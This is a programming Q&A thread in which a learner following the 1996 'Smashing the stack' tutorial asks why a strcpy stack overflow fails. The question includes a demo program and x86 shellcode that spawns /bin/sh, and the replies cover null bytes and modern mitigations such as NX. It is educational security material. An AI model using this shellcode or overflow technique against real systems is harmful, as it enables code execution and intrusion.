# Using strcpy & buffer overflow to execute shell code

Tags: c, shell, security, buffer, buffer-overflow

I've been going through "Smashing the stack for fun and profit" and am having issues executing shell code through a buffer overflow.

Running on Linux, Ubuntu 32bit via VirtualBox
gcc compiler with -fno-stack-protector -ggdb -g tags

My code is identical to the reading and I don't understand why it's not working.
I get a segmentation fault. When I use gbd to debug it says "0x08048268 in ??" which I know means it can't find the address in the scope. I don't understand why it shouldn't be able to.

I am compiling with stack guard off as well.

```
 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
   char buffer[96];
   int i;
   long *long_ptr = (long *) large_string;
   for (i = 0; i < 32; i++)
      *(long_ptr + i) = (int) buffer;
   for (i = 0; i < strlen(shellcode); i++)
      large_string[i] = shellcode[i];
   large_string[127] = '\0';
   strcpy(buffer,large_string);
}
```

Comment: which operating system? which shell? which compiler? what optimizations?

Comment: @PeterMiehle added info to the op

Comment: `memcpy` would work better than `strcpy` in case large_string contains any zero bytes. Like in the address of `buffer` converted to `long`.

Comment: @BoPersson I would like to follow the reading, as there's many more exercises I have to do. Shouldn't this be able to work?

Comment: As far as I can tell, there is no guarantee that `large_string` will ever contain nul bytes. `strcpy` requires nul terminated string.

Comment: @user694733 I added a null byte to the end of large_string but it didn't change anything

Answer (score 2):

That’s an old article, but I’ve cited it too.  The problem is that your code is “identical to the reading.”  Those aren’t magic numbers from a script.  Pay close attention to *how* Aleph One determined which values to smash the stack with for that program.

And keep in mind that the article is from 1996, and the kernel and GCC devs have read it too.

Comment: I'm confused why our values should vary. He doesn't elaborate at all where the 128 and 96 came from. So I assumed that's just the string length he chose

Comment: Right.  If you read on, he does talk about how to choose a string size and pad with `nop` instructions.  I don’t off the top of my head know exactly what GCC and the kernel are doing differently to make it fail, possibly the NX bit,  but keep in mind that that article is from 1996 and everybody else has read it too.

Comment: :/ It doesn't make sense to go on to further examples if I can't get this one. I've been thinking about it and i changed the ++ in the first for loop to +=4, since a long is 4 bits. I no longer get a seg fault however the shell never executes. Do you think I'm on the right track? or not at all

Comment: gdb says it exits with code 0230, looking that up now

Comment: Now I’m curious. I’d expect a modern kernel to set the memory pages of the stack non-executable specifically to prevent this from working.

Comment: Not sure if it matters but I'm working on a vm configured for these type of exercises. I just logged into a different root user that has address space randomization off and not the gbd says it exits with code 0150. I've been searching the exit codes and haven't found any straight forward answer to what the codes stand for. Are they helpful at all?

Comment: See here: https://stackoverflow.com/questions/1101957/are-there-any-standard-exit-status-codes-in-linux

Comment: hmm so the error code doesn't seem to be very helpful at all.. I don't understand why this is so impossible and not even a complex example

Comment: You can't expect that 20 year old exploits should still work.